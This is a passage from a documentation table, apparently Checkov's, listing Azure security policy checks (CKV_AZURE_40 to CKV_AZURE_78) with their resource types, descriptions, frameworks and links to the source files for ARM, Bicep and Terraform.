[KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py) | +| 1690 | CKV_AZURE_40 | resource | azurerm_key_vault_key | Ensure that the expiration date is set on all keys | Terraform | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyExpirationDate.py) | +| 1691 | CKV_AZURE_41 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that the expiration date is set on all secrets | arm | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py) | +| 1692 | CKV_AZURE_41 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that the expiration date is set on all secrets | Bicep | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py) | +| 1693 | CKV_AZURE_41 | resource | azurerm_key_vault_secret | Ensure that the expiration date is set on all secrets | Terraform | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretExpirationDate.py) | +| 1694 | CKV_AZURE_42 | resource | Microsoft.KeyVault/vaults | Ensure the key vault is recoverable | arm | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py) | +| 1695 | CKV_AZURE_42 | resource | Microsoft.KeyVault/vaults | Ensure the key vault is recoverable | Bicep | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py) | +| 1696 | CKV_AZURE_42 | resource | azurerm_key_vault | Ensure the key vault is recoverable | Terraform | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyvaultRecoveryEnabled.py) | +| 1697 | CKV_AZURE_43 | resource | azurerm_storage_account | Ensure Storage Accounts adhere to the naming rules | Terraform | [StorageAccountName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountName.py) | +| 1698 | CKV_AZURE_44 | resource | Microsoft.Storage/storageAccounts | Ensure Storage Account is using the latest version of TLS encryption | arm | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py) | +| 1699 | CKV_AZURE_44 | resource | Microsoft.Storage/storageAccounts | Ensure Storage Account is using the latest version of TLS encryption | Bicep | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py) | +| 1700 | CKV_AZURE_44 | resource | azurerm_storage_account | Ensure Storage Account is using the latest version of TLS encryption | Terraform | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountMinimumTlsVersion.py) | +| 1701 | CKV_AZURE_45 | resource | azurerm_virtual_machine | Ensure that no sensitive credentials are exposed in VM custom_data | Terraform | [VMCredsInCustomData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMCredsInCustomData.py) | +| 1702 | CKV_AZURE_47 | resource | Microsoft.DBforMariaDB/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | arm | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py) | +| 1703 | CKV_AZURE_47 | resource | Microsoft.DBforMariaDB/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | Bicep | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py) | +| 1704 | CKV_AZURE_47 | resource | azurerm_mariadb_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | Terraform | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBSSLEnforcementEnabled.py) | +| 1705 | CKV_AZURE_48 | resource | azurerm_mariadb_server | Ensure 'public network access enabled' is set to 'False' for MariaDB servers | Terraform | [MariaDBPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBPublicAccessDisabled.py) | +| 1706 | CKV_AZURE_49 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | arm | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py) | +| 1707 | CKV_AZURE_49 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | Bicep | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py) | +| 1708 | CKV_AZURE_49 | resource | azurerm_linux_virtual_machine_scale_set | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureScaleSetPassword.py) | +| 1709 | CKV_AZURE_50 | resource | Microsoft.Compute/virtualMachines | Ensure Virtual Machine Extensions are not Installed | arm | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py) | +| 1710 | CKV_AZURE_50 | resource | Microsoft.Compute/virtualMachines | Ensure Virtual Machine Extensions are not Installed | Bicep | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py) | +| 1711 | CKV_AZURE_50 | resource | azurerm_linux_virtual_machine | Ensure Virtual Machine Extensions are not Installed | Terraform | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py) | +| 1712 | CKV_AZURE_50 | resource | azurerm_windows_virtual_machine | Ensure Virtual Machine Extensions are not Installed | Terraform | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py) | +| 1713 | CKV_AZURE_52 | resource | Microsoft.Sql/servers | Ensure MSSQL is using the latest version of TLS encryption | arm | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py) | +| 1714 | CKV_AZURE_52 | resource | Microsoft.Sql/servers | Ensure MSSQL is using the latest version of TLS encryption | Bicep | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py) | +| 1715 | CKV_AZURE_52 | resource | azurerm_mssql_server | Ensure MSSQL is using the latest version of TLS encryption | Terraform | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerMinTLSVersion.py) | +| 1716 | CKV_AZURE_53 | resource | Microsoft.DBforMySQL/servers | Ensure 'public network access enabled' is set to 'False' for mySQL servers | arm | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py) | +| 1717 | CKV_AZURE_53 | resource | Microsoft.DBforMySQL/servers | Ensure 'public network access enabled' is set to 'False' for mySQL servers | Bicep | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py) | +| 1718 | CKV_AZURE_53 | resource | azurerm_mysql_server | Ensure 'public network access enabled' is set to 'False' for mySQL servers | Terraform | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLPublicAccessDisabled.py) | +| 1719 | CKV_AZURE_54 | resource | Microsoft.DBforMySQL/servers | Ensure MySQL is using the latest version of TLS encryption | arm | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py) | +| 1720 | CKV_AZURE_54 | resource | Microsoft.DBforMySQL/servers | Ensure MySQL is using the latest version of TLS encryption | Bicep | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py) | +| 1721 | CKV_AZURE_54 | resource | azurerm_mysql_server | Ensure MySQL is using the latest version of TLS encryption | Terraform | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerMinTLSVersion.py) | +| 1722 | CKV_AZURE_55 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Servers | Terraform | [AzureDefenderOnServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnServers.py) | +| 1723 | CKV_AZURE_56 | resource | Microsoft.Web/sites/config | Ensure that function apps enables Authentication | arm | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py) | +| 1724 | CKV_AZURE_56 | resource | Microsoft.Web/sites/config | Ensure that function apps enables Authentication | Bicep | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py) | +| 1725 | CKV_AZURE_56 | resource | azurerm_function_app | Ensure that function apps enables Authentication | Terraform | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsEnableAuthentication.py) | +| 1726 | CKV_AZURE_57 | resource | Microsoft.Web/sites | Ensure that CORS disallows every resource to access app services | arm | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDisallowCORS.py) | +| 1727 | CKV_AZURE_57 | resource | Microsoft.Web/sites | Ensure that CORS disallows every resource to access app services | Bicep | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDisallowCORS.py) | +| 1728 | CKV_AZURE_57 | resource | azurerm_app_service | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | +| 1729 | CKV_AZURE_57 | resource | azurerm_linux_web_app | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | +| 1730 | CKV_AZURE_57 | resource | azurerm_windows_web_app | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | +| 1731 | CKV_AZURE_58 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces enables managed virtual networks | arm | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | +| 1732 | CKV_AZURE_58 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces enables managed virtual networks | Bicep | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | +| 1733 | CKV_AZURE_58 | resource | azurerm_synapse_workspace | Ensure that Azure Synapse workspaces enables managed virtual networks | Terraform | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | +| 1734 | CKV_AZURE_59 | resource | Microsoft.Storage/storageAccounts | Ensure that Storage accounts disallow public access | arm | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py) | +| 1735 | CKV_AZURE_59 | resource | Microsoft.Storage/storageAccounts | Ensure that Storage accounts disallow public access | Bicep | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py) | +| 1736 | CKV_AZURE_59 | resource | azurerm_storage_account | Ensure that Storage accounts disallow public access | Terraform | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py) | +| 1737 | CKV_AZURE_61 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for App Service | Terraform | [AzureDefenderOnAppServices.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnAppServices.py) | +| 1738 | CKV_AZURE_62 | resource | Microsoft.Web/sites | Ensure function apps are not accessible from all regions | arm | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppDisallowCORS.py) | +| 1739 | CKV_AZURE_62 | resource | Microsoft.Web/sites | Ensure function apps are not accessible from all regions | Bicep | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppDisallowCORS.py) | +| 1740 | CKV_AZURE_62 | resource | azurerm_function_app | Ensure function apps are not accessible from all regions | Terraform | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppDisallowCORS.py) | +| 1741 | CKV_AZURE_63 | resource | Microsoft.Web/sites/config | Ensure that App service enables HTTP logging | arm | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py) | +| 1742 | CKV_AZURE_63 | resource | Microsoft.Web/sites/config | Ensure that App service enables HTTP logging | Bicep | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py) | +| 1743 | CKV_AZURE_63 | resource | azurerm_app_service | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | +| 1744 | CKV_AZURE_63 | resource | azurerm_linux_web_app | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | +| 1745 | CKV_AZURE_63 | resource | azurerm_windows_web_app | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | +| 1746 | CKV_AZURE_64 | resource | Microsoft.StorageSync/storageSyncServices | Ensure that Azure File Sync disables public network access | arm | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py) | +| 1747 | CKV_AZURE_64 | resource | Microsoft.StorageSync/storageSyncServices | Ensure that Azure File Sync disables public network access | Bicep | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py) | +| 1748 | CKV_AZURE_64 | resource | azurerm_storage_sync | Ensure that Azure File Sync disables public network access | Terraform | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageSyncPublicAccessDisabled.py) | +| 1749 | CKV_AZURE_65 | resource | Microsoft.Web/sites/config | Ensure that App service enables detailed error messages | arm | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py) | +| 1750 | CKV_AZURE_65 | resource | Microsoft.Web/sites/config | Ensure that App service enables detailed error messages | Bicep | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py) | +| 1751 | CKV_AZURE_65 | resource | azurerm_app_service | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | +| 1752 | CKV_AZURE_65 | resource | azurerm_linux_web_app | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | +| 1753 | CKV_AZURE_65 | resource | azurerm_windows_web_app | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | +| 1754 | CKV_AZURE_66 | resource | Microsoft.Web/sites/config | Ensure that App service enables failed request tracing | arm | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py) | +| 1755 | CKV_AZURE_66 | resource | Microsoft.Web/sites/config | Ensure that App service enables failed request tracing | Bicep | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py) | +| 1756 | CKV_AZURE_66 | resource | azurerm_app_service | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | +| 1757 | CKV_AZURE_66 | resource | azurerm_linux_web_app | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | +| 1758 | CKV_AZURE_66 | resource | azurerm_windows_web_app | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | +| 1759 | CKV_AZURE_67 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest, if used to run the Function app | arm | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py) | +| 1760 | CKV_AZURE_67 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Bicep | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py) | +| 1761 | CKV_AZURE_67 | resource | Microsoft.Web/sites/slots | Ensure that 'HTTP Version' is the latest, if used to run the Function app | arm | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py) | +| 1762 | CKV_AZURE_67 | resource | Microsoft.Web/sites/slots | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Bicep | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py) | +| 1763 | CKV_AZURE_67 | resource | azurerm_function_app | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py) | +| 1764 | CKV_AZURE_67 | resource | azurerm_function_app_slot | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py) | +| 1765 | CKV_AZURE_68 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server disables public network access | Terraform | [PostgreSQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerPublicAccessDisabled.py) | +| 1766 | CKV_AZURE_69 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Azure SQL database servers | Terraform | [AzureDefenderOnSqlServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServers.py) | +| 1767 | CKV_AZURE_70 | resource | azurerm_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1768 | CKV_AZURE_70 | resource | azurerm_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1769 | CKV_AZURE_70 | resource | azurerm_linux_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1770 | CKV_AZURE_70 | resource | azurerm_linux_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1771 | CKV_AZURE_70 | resource | azurerm_windows_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1772 | CKV_AZURE_70 | resource | azurerm_windows_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1773 | CKV_AZURE_71 | resource | Microsoft.Web/sites | Ensure that Managed identity provider is enabled for web apps | arm | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py) | +| 1774 | CKV_AZURE_71 | resource | Microsoft.Web/sites | Ensure that Managed identity provider is enabled for web apps | Bicep | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py) | +| 1775 | CKV_AZURE_71 | resource | azurerm_app_service | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | +| 1776 | CKV_AZURE_71 | resource | azurerm_linux_web_app | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | +| 1777 | CKV_AZURE_71 | resource | azurerm_windows_web_app | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | +| 1778 | CKV_AZURE_72 | resource | Microsoft.Web/sites | Ensure that remote debugging is not enabled for app services | arm | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py) | +| 1779 | CKV_AZURE_72 | resource | Microsoft.Web/sites | Ensure that remote debugging is not enabled for app services | Bicep | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py) | +| 1780 | CKV_AZURE_72 | resource | azurerm_app_service | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | +| 1781 | CKV_AZURE_72 | resource | azurerm_linux_web_app | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | +| 1782 | CKV_AZURE_72 | resource | azurerm_windows_web_app | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | +| 1783 | CKV_AZURE_73 | resource | Microsoft.Automation/automationAccounts/variables | Ensure that Automation account variables are encrypted | arm | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AutomationEncrypted.py) | +| 1784 | CKV_AZURE_73 | resource | Microsoft.Automation/automationAccounts/variables | Ensure that Automation account variables are encrypted | Bicep | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AutomationEncrypted.py) | +| 1785 | CKV_AZURE_73 | resource | azurerm_automation_variable_bool | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | +| 1786 | CKV_AZURE_73 | resource | azurerm_automation_variable_datetime | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | +| 1787 | CKV_AZURE_73 | resource | azurerm_automation_variable_int | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | +| 1788 | CKV_AZURE_73 | resource | azurerm_automation_variable_string | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | +| 1789 | CKV_AZURE_74 | resource | Microsoft.Kusto/clusters | Ensure that Azure Data Explorer (Kusto) uses disk encryption | arm | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py) | +| 1790 | CKV_AZURE_74 | resource | Microsoft.Kusto/clusters | Ensure that Azure Data Explorer (Kusto) uses disk encryption | Bicep | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py) | +| 1791 | CKV_AZURE_74 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer (Kusto) uses disk encryption | Terraform | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerUsesDiskEncryption.py) | +| 1792 | CKV_AZURE_75 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer uses double encryption | Terraform | [AzureDataExplorerDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDataExplorerDoubleEncryptionEnabled.py) | +| 1793 | CKV_AZURE_76 | resource | Microsoft.Batch/batchAccounts | Ensure that Azure Batch account uses key vault to encrypt data | arm | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py) | +| 1794 | CKV_AZURE_76 | resource | Microsoft.Batch/batchAccounts | Ensure that Azure Batch account uses key vault to encrypt data | Bicep | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py) | +| 1795 | CKV_AZURE_76 | resource | azurerm_batch_account | Ensure that Azure Batch account uses key vault to encrypt data | Terraform | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureBatchAccountUsesKeyVaultEncryption.py) | +| 1796 | CKV_AZURE_77 | resource | azurerm_network_security_group | Ensure that UDP Services are restricted from the Internet | Terraform | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py) | +| 1797 | CKV_AZURE_77 | resource | azurerm_network_security_rule | Ensure that UDP Services are restricted from the Internet | Terraform | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py) | +| 1798 | CKV_AZURE_78 | resource | azurerm_app_service | Ensure FTP deployments are disabled | Terraform | 